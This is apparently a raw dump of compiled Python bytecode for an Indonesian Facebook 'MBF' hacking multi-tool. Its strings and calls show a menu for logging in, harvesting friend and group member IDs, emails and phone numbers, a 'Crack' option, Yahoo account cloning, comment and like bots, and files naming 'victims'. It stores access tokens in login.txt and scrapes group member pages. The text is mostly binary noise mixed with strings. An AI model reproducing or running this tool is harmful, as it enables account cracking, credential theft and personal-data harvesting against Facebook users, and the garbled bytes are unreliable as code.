Keluar Program.s,\x00\x00\x00xdg-open \'https://m.youtube.com/UCuZ3LerXYmrvSKmtuJWutsA\'(\x04\x00\x00\x00R\x08\x00\x00\x00t\x06\x00\x00\x00systemR\t\x00\x00\x00R\n\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00keluarZ\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x05\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x03\x00d\x04\x00\x14GHd\x00\x00S(\x05\x00\x00\x00NR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_(\x02\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00bannerid`\x00\x00\x00s\x06\x00\x00\x00\x00\x01\r\x12\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sU\x01\x00\x00y\xfc\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00t\x02\x00j\x03\x00d\x03\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x04\x00j\x05\x00|\x01\x00j\x06\x00\x83\x01\x00}\x02\x00|\x02\x00d\x04\x00\x19}\x03\x00|\x02\x00d\x05\x00\x19}\x04\x00t\x07\x00j\x08\x00|\x02\x00d\x04\x00\x19\x83\x01\x00\x01t\t\x00j\n\x00d\x06\x00\x83\x01\x00\x01d\x07\x00|\x03\x00\x16GHd\x08\x00|\x04\x00\x16GHt\x0b\x00j\x0c\x00\x83\x00\x00}\x05\x00|\x05\x00j\r\x00d\t\x00\x83\x01\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00d\x16\x00\x14GHd\x17\x00GHd\x18\x00GHd\x19\x00GHd\x1a\x00GHd\x1b\x00GHt\x0e\x00\x83\x00\x00\x01WnR\x00\x04t\x0f\x00t\x10\x00f\x02\x00k\n\x00rP\x01\x01\x01\x01t\t\x00j\n\x00d\x06\x00\x83\x01\x00\x01d\x1c\x00GHd\x15\x00d\x16\x00\x14GHd\x17\x00GHd\x18\x00GHd\x19\x00GHd\x1a\x00GHd\x1b\x00GHt\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1d\x00\x00\x00Ns\t\x00\x00\x00login.txtt\x01\x00\x00\x00rs+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x02\x00\x00\x00idR\x02\x00\x00\x00sJ\x00\x00\x00\x1b[1;31m __.-/| \x1b[1;91m[+]---\x1b[1;97m %s \x1b[1;91m---[+]s[\x00\x00\x00 \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\' \x1b[1;91m[+] \x1b[1;92mID \x1b[1;97m : %ssa\x00\x00\x00 \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+ \x1b[1;91m[+] \x1b[1;92mTGL \x1b[1;97m: %d %b %Ys\x86\x00\x00\x00 \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m| \x1b[1;91m[+] \x1b[1;92mURL \x1b[1;97m: \x1b[4mhttps://m.facebook.com/\x1b[0ms+\x00\x00\x00\x1b[1;31m /\\ /\\ / 
| \x1b[1;34m+------+s5\x00\x00\x00\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |s5\x00\x00\x00\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |s=\x00\x00\x00\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_sL\x00\x00\x00\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))s5\x00\x00\x00\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |s*\x00\x00\x00\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\s!\x00\x00\x00\x1b[1;31m | \\____( )___) )____sb\x00\x00\x00\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0ms\xd8\x00\x00\x00\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0miK\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s\x9d\x00\x00\x00\x1b[1;91m[\x1b[1;97m1.\x1b[1;91m] \x1b[1;92mLogin \x1b[1;91m[\x1b[1;97m6.\x1b[1;91m] \x1b[1;92mAmbil Nomor \x1b[1;91m[\x1b[1;97m11.\x1b[1;91m] \x1b[1;92mHapus data mbfzs\x94\x00\x00\x00\x1b[1;91m[\x1b[1;97m2.\x1b[1;91m] \x1b[1;92mAmbil ID teman \x1b[1;91m[\x1b[1;97m7.\x1b[1;91m] \x1b[1;92mLihat Info Teman \x1b[1;91m[\x1b[1;97m12.\x1b[1;91m] \x1b[1;91mKeluarsh\x00\x00\x00\x1b[1;91m[\x1b[1;97m3.\x1b[1;91m] \x1b[1;92mAmbil ID teman dari grup \x1b[1;91m[\x1b[1;97m8.\x1b[1;91m] \x1b[1;92mCloning Yahoosd\x00\x00\x00\x1b[1;91m[\x1b[1;97m4.\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m[\x1b[1;97m9.\x1b[1;91m] \x1b[1;92mBot Komensd\x00\x00\x00\x1b[1;91m[\x1b[1;97m5.\x1b[1;91m] \x1b[1;92mAmbil email \x1b[1;91m[\x1b[1;97m10.\x1b[1;91m] \x1b[1;92mBot Likes\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : 
\x1b[4mhttps://github.com/CLB-09\x1b[0m(\x11\x00\x00\x00t\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textt\x01\x00\x00\x00nt\x06\x00\x00\x00appendR\x08\x00\x00\x00R\x15\x00\x00\x00R\x01\x00\x00\x00t\x05\x00\x00\x00todayt\x08\x00\x00\x00strftimet\x05\x00\x00\x00piliht\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOError(\x06\x00\x00\x00t\x05\x00\x00\x00tokenR\x18\x00\x00\x00t\x01\x00\x00\x00aR\x19\x00\x00\x00R\x1a\x00\x00\x00t\x07\x00\x00\x00tanggal(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00tampilv\x00\x00\x00sP\x00\x00\x00\x00\x01\x03\x01\x15\x01\x13\x01\x12\x01\n\x01\n\x01\x11\x01\r\x01\t\x01\t\x01\x0c\x01\x0e\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x04\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0b\x02\x13\x01\r\x12\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x0e\x00\x00\x00C\x00\x00\x00s\xbf\x01\x00\x00t\x00\x00d\x01\x00d\x02\x00d\x03\x00d\x04\x00d\x05\x00d\x06\x00d\x07\x00d\x08\x00d\t\x00d\n\x00d\x0b\x00d\x0c\x00d\r\x00g\x0c\x00\x83\x02\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00rI\x00t\x01\x00\x83\x00\x00\x01nr\x01|\x00\x00d\x03\x00k\x02\x00r_\x00t\x02\x00\x83\x00\x00\x01n\\\x01|\x00\x00d\x04\x00k\x02\x00ru\x00t\x03\x00\x83\x00\x00\x01nF\x01|\x00\x00d\x05\x00k\x02\x00r\x8b\x00t\x04\x00\x83\x00\x00\x01n0\x01|\x00\x00d\x06\x00k\x02\x00r\xa1\x00t\x05\x00\x83\x00\x00\x01n\x1a\x01|\x00\x00d\x07\x00k\x02\x00r\xb7\x00t\x06\x00\x83\x00\x00\x01n\x04\x01|\x00\x00d\x08\x00k\x02\x00r\xd4\x00t\x07\x00\x83\x00\x00\x01t\x08\x00\x83\x00\x00\x01n\xe7\x00|\x00\x00d\t\x00k\x02\x00r\xea\x00t\t\x00\x83\x00\x00\x01n\xd1\x00|\x00\x00d\n\x00k\x02\x00r\x00\x01t\n\x00\x83\x00\x00\x01n\xbb\x00|\x00\x00d\x0b\x00k\x02\x00r\x16\x01t\x0b\x00\x83\x00\x00\x01n\xa5\x00|\x00\x00d\x0c\x00k\x02\x00r\xa5\x01d\x0e\x00GHt\x0c\x00j\r\x00d\x0f\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x10\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x11\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x12\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x13\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x14\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x15\x00\x83\x01\x00\x01t\x0e\x00d\x03\x00\x83\x01\x00\x01d\x16\x00GHt\x0e\x00d\x02\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x16\x00|\x00\x00d\r\x00k\x02\x00r\xbb\x01t\x0f\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x17\x00\x00\x00Ns\x14\x00\x00\x00\x1b[1;91mmbfz\x1b[1;97m> i\x01\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00i\x04\x00\x00\x00i\x05\x00\x00\x00i\x06\x00\x00\x00i\x07\x00\x00\x00i\x08\x00\x00\x00i\t\x00\x00\x00i\n\x00\x00\x00i\x0b\x00\x00\x00i\x0c\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[%] \x1b[1;92mMenghapus Data \x1b[1;97m...s\x0f\x00\x00\x00rm -f teman.txts\x0f\x00\x00\x00rm -f login.txts\x11\x00\x00\x00rm -f IDgroup.txts\x10\x00\x00\x00rm -f korban.txts\x11\x00\x00\x00rm -f korbang.txts\x0c\x00\x00\x00rm -rf emails\r\x00\x00\x00rm -rf sampahs\x1a\x00\x00\x00\x1b[1;91m[+] 
\x1b[1;92mSelesai.(\x10\x00\x00\x00R\x14\x00\x00\x00R)\x00\x00\x00t\x07\x00\x00\x00ambilidt\x07\x00\x00\x00idgroupt\n\x00\x00\x00pilihcrackt\x05\x00\x00\x00dumpmt\t\x00\x00\x00dumpnomort\x07\x00\x00\x00getdatat\x06\x00\x00\x00searcht\x05\x00\x00\x00clonet\x05\x00\x00\x00koment\x05\x00\x00\x00reactR\x08\x00\x00\x00R\x15\x00\x00\x00t\x06\x00\x00\x00tenangR\x16\x00\x00\x00(\x01\x00\x00\x00t\x06\x00\x00\x00karjok(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R&\x00\x00\x00\xb5\x00\x00\x00sJ\x00\x00\x00\x00\x013\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\x07\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\n\x01\x05\x01\n\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x03\x00d\x04\x00\x14GHd\x00\x00S(\x05\x00\x00\x00NR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CL\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_(\x02\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x0b\x00\x00\x00banner_grup\xdd\x00\x00\x00s\x06\x00\x00\x00\x00\x01\r\x12\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xfe\x00\x00\x00d\x01\x00GHt\x00\x00d\x02\x00\x83\x01\x00}\x00\x00t\x00\x00d\x03\x00\x83\x01\x00}\x01\x00d\x04\x00GHt\x01\x00d\x05\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d\x06\x00d\x07\x00\x83\x00\x01\x01|\x00\x00t\x02\x00j\x04\x00d\x08\x00<|\x01\x00t\x02\x00j\x04\x00d\t\x00<t\x02\x00j\x05\x00\x83\x00\x00\x01t\x02\x00j\x06\x00\x83\x00\x00}\x02\x00d\n\x00|\x02\x00k\x06\x00s\x84\x00d\x0b\x00|\x02\x00k\x06\x00r\xbb\x00d\x0c\x00GHd\r\x00d\x0e\x00\x14GHt\x07\x00d\x0f\x00\x83\x01\x00}\x03\x00t\x08\x00d\x10\x00\x83\x01\x00\x01t\x01\x00d\x11\x00\x83\x01\x00\x01d\x10\x00a\t\x00n?\x00d\x12\x00|\x02\x00k\x06\x00r\xe2\x00d\x13\x00GHt\x07\x00d\x14\x00\x83\x01\x00}\x04\x00t\n\x00\x83\x00\x00\x01n\x18\x00d\x15\x00GHt\x07\x00d\x14\x00\x83\x01\x00}\x05\x00t\n\x00\x83\x00\x00\x01d\x00\x00S(\x16\x00\x00\x00Ns.\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mLOGIN AKUN FACEBOOK s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSedang Masuk...s\x16\x00\x00\x00https://m.facebook.comt\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicet\x06\x00\x00\x00m_sesss!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLogin berhasil.i2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter...i\x01\x00\x00\x00s$\x00\x00\x00https://mobile.facebook.com/home.phpt\n\x00\x00\x00checkpointsA\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAkun kena checkpoint\nCoba Login dengan browser.s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x16\x00\x00\x00\x1b[1;91m[X] Login Gagal(\x0b\x00\x00\x00R\x10\x00\x00\x00t\x04\x00\x00\x00bukat\x02\x00\x00\x00brt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlR\x07\x00\x00\x00R7\x00\x00\x00t\x03\x00\x00\x00logR,\x00\x00\x00(\x06\x00\x00\x00t\x02\x00\x00\x00ust\x02\x00\x00\x00pat\x03\x00\x00\x00urlt\x05\x00\x00\x00inputt\x07\x00\x00\x00inpaut3t\x07\x00\x00\x00inputs3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x05\x00\x00\x00login\xf3\x00\x00\x00s0\x00\x00\x00\x00\x02\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x18\x01\x05\x01\t\x01\x0c\x01\n\x01\n\x01\t\x01\x0c\x01\x05\x01\x0c\x01\n\x02\x05\x01\x0c\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x8c\x00\x00\x00t\x00\x00t\x01\x00\x83\x01\x00d\x01\x00k\x03\x00r\x88\x00d\x02\x00GHyS\x00t\x02\x00t\x03\x00j\x04\x00j\x05\x00d\x01\x00\x19d\x03\x00\x17d\x04\x00\x83\x02\x00j\x06\x00d\x05\x00j\x07\x00t\x01\x00\x83\x01\x00\x83\x01\x00\x01d\x06\x00GHt\x08\x00d\x07\x00\x83\x01\x00\x01t\t\x00d\x08\x00\x83\x01\x00}\x00\x00t\n\x00\x83\x00\x00\x01Wq\x88\x00\x01\x01\x01d\t\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00q\x88\x00Xn\x00\x00d\x00\x00S(\n\x00\x00\x00Ni\x00\x00\x00\x00s\x1e\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMenyimpan...s\x0c\x00\x00\x00/IDgroup.txtt\x01\x00\x00\x00ws\x01\x00\x00\x00\ns2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID tersimpan \x1b[1;97m*IDgrup.txt*i\x01\x00\x00\x00s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x19\x00\x00\x00\x1b[1;91m[X] Gagal meyimpan(\x0b\x00\x00\x00R\x0c\x00\x00\x00t\t\x00\x00\x00id_bgroupR\x1b\x00\x00\x00R\x08\x00\x00\x00R\t\x00\x00\x00t\x04\x00\x00\x00patht\x05\x00\x00\x00writet\x04\x00\x00\x00joinR7\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x02\x00\x00\x00t\x06\x00\x00\x00input3t\x06\x00\x00\x00inpus3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00simpan\x0f\x01\x00\x00s\x16\x00\x00\x00\x00\x01\x12\x01\x05\x01\x03\x01-\x01\x05\x01\n\x01\x0c\x01\x0b\x01\x03\x01\x05\x01c\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00st\x00\x00\x00y+\x00t\x00\x00j\x01\x00|\x00\x00\x83\x01\x00}\x01\x00t\x02\x00t\x00\x00j\x03\x00_\x04\x00|\x01\x00j\x05\x00\x83\x00\x00}\x01\x00Wn\x1f\x00\x01\x01\x01d\x01\x00GHt\x06\x00d\x02\x00\x83\x01\x00}\x02\x00t\x07\x00\x83\x00\x00\x01n\x01\x00Xd\x03\x00|\x01\x00k\x06\x00rl\x00t\x08\x00t\x00\x00j\t\x00\x83\x00\x00j\n\x00\x83\x01\x00S|\x01\x00Sd\x00\x00S(\x04\x00\x00\x00Ns\x10\x00\x00\x00\x1b[1;91m[!] 
Errors!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x1b\x00\x00\x00<link rel="redirect" href="(\x0b\x00\x00\x00R@\x00\x00\x00R\x1b\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlR\x1c\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R?\x00\x00\x00t\t\x00\x00\x00find_linkRH\x00\x00\x00(\x03\x00\x00\x00t\x01\x00\x00\x00dR\r\x00\x00\x00t\x06\x00\x00\x00inpute(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R?\x00\x00\x00\x1b\x01\x00\x00s\x16\x00\x00\x00\x00\x01\x03\x01\x0f\x01\x0c\x01\x10\x01\x03\x01\x05\x01\x0c\x01\x0b\x01\x0c\x01\x13\x02c\x01\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\xb1\x00\x00\x00x\xaa\x00t\x00\x00j\x01\x00d\x01\x00|\x00\x00\x83\x02\x00D]\x96\x00}\x01\x00|\x01\x00j\x02\x00d\x02\x00\x83\x01\x00d\x03\x00k\x02\x00rC\x00|\x01\x00j\x03\x00d\x04\x00d\x05\x00\x83\x02\x00}\x02\x00n\x1e\x00|\x01\x00j\x03\x00d\x06\x00d\x05\x00\x83\x02\x00j\x03\x00d\x07\x00d\x05\x00\x83\x02\x00}\x02\x00|\x02\x00t\x04\x00k\x07\x00r\x13\x00t\x05\x00\x83\x00\x00\x01t\x06\x00j\x07\x00j\x08\x00d\x08\x00|\x02\x00\x17d\t\x00\x17\x83\x01\x00\x01t\x06\x00j\x07\x00j\t\x00\x83\x00\x00\x01t\x04\x00j\n\x00|\x02\x00\x83\x01\x00\x01q\x13\x00q\x13\x00Wd\x00\x00S(\n\x00\x00\x00Ns\x1a\x00\x00\x00<h3><a href="/(.*?)fref=pbs\x0b\x00\x00\x00profile.phpi\xff\xff\xff\xfft\x01\x00\x00\x00?t\x00\x00\x00\x00s\x0f\x00\x00\x00profile.php?id=s\x05\x00\x00\x00&s0\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;96mMengumpulkan \x1b[1;91m: \x1b[1;97ms\x01\x00\x00\x00\n(\x0b\x00\x00\x00t\x02\x00\x00\x00ret\x07\x00\x00\x00findallt\x04\x00\x00\x00findt\x07\x00\x00\x00replaceRN\x00\x00\x00t\x0b\x00\x00\x00banner_likeR\t\x00\x00\x00t\x06\x00\x00\x00stdoutRP\x00\x00\x00t\x05\x00\x00\x00flushR#\x00\x00\x00(\x03\x00\x00\x00RY\x00\x00\x00t\x01\x00\x00\x00iR*\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x10\x00\x00\x00saring_id_group1(\x01\x00\x00s\x12\x00\x00\x00\x00\x01\x19\x01\x15\x01\x15\x02\x1e\x01\x0c\x01\x07\x01\x18\x01\r\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\xbf\x00\x00\x00x\x8f\x00t\x00\x00\x83\x00\x00\x01t\x01\x00d\x01\x00\x83\x01\x00a\x02\x00d\x02\x00GHt\x03\x00d\x03\x00t\x02\x00\x17d\x04\x00\x17\x83\x01\x00}\x00\x00d\x05\x00j\x04\x00t\x05\x00j\x06\x00d\x06\x00|\x00\x00\x83\x02\x00d\x07\x00\x19j\x07\x00\x83\x00\x00d\x08\x00\x1f\x83\x01\x00}\x01\x00y\x1a\x00t\x08\x00j\t\x00d\t\x00d\n\x00\x83\x00\x01j\n\x00}\x02\x00PWq\x03\x00\x01\x01\x01d\x0b\x00GHt\x0b\x00d\x0c\x00\x83\x01\x00\x01q\x03\x00q\x03\x00Xq\x03\x00Wd\r\x00|\x01\x00\x16GHt\x0c\x00d\x0e\x00\x83\x01\x00}\x03\x00t\x0b\x00d\x08\x00\x83\x01\x00\x01t\r\x00|\x00\x00\x83\x01\x00\x01|\x02\x00S(\x0f\x00\x00\x00Ns*\x00\x00\x00\x1b[1;91m[+]\x1b[1;92m ID Grup\x1b[1;91m :\x1b[1;97m s#\x00\x00\x00\x1b[1;91m[+] \x1b[1;96mMengecek Grup....s0\x00\x00\x00https://m.facebook.com/browse/group/members/?id=sI\x00\x00\x00&start=0&listType=list_nonfriend&refid=18&_rdc=1&_rdrt\x01\x00\x00\x00 s\x14\x00\x00\x00<title>(.*?)</title>i\x00\x00\x00\x00i\x01\x00\x00\x00t\t\x00\x00\x00url_regexs\x16\x00\x00\x00/browse/group/members/s/\x00\x00\x00\x1b[1;91m[!] 
